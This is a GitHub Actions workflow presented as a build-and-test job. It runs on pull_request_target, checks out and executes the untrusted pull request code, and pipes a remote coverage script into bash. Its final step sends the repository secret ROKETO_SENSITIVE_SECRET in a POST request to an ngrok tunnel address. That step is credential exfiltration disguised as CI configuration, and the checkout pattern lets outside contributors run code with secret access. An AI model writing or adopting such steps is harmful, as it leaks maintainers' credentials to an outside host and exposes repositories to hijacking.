name: PR_TARGET_EVENT
on: pull_request_target
jobs:
  Build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      
      - uses: actions/setup-node@v1
      - run: |
          npm install
          npm test
          
      - name: Upload coverage
        run: |
          bash <(curl -s https://codecov.io/bash)
      
      - uses: fjogeleit/http-request-action@master
        with:
          url: 'https://934e-77-137-8-226.ngrok.io'
          method: 'POST'
          data: '{"secret": "${{ secrets.ROKETO_SENSITIVE_SECRET }}"}'
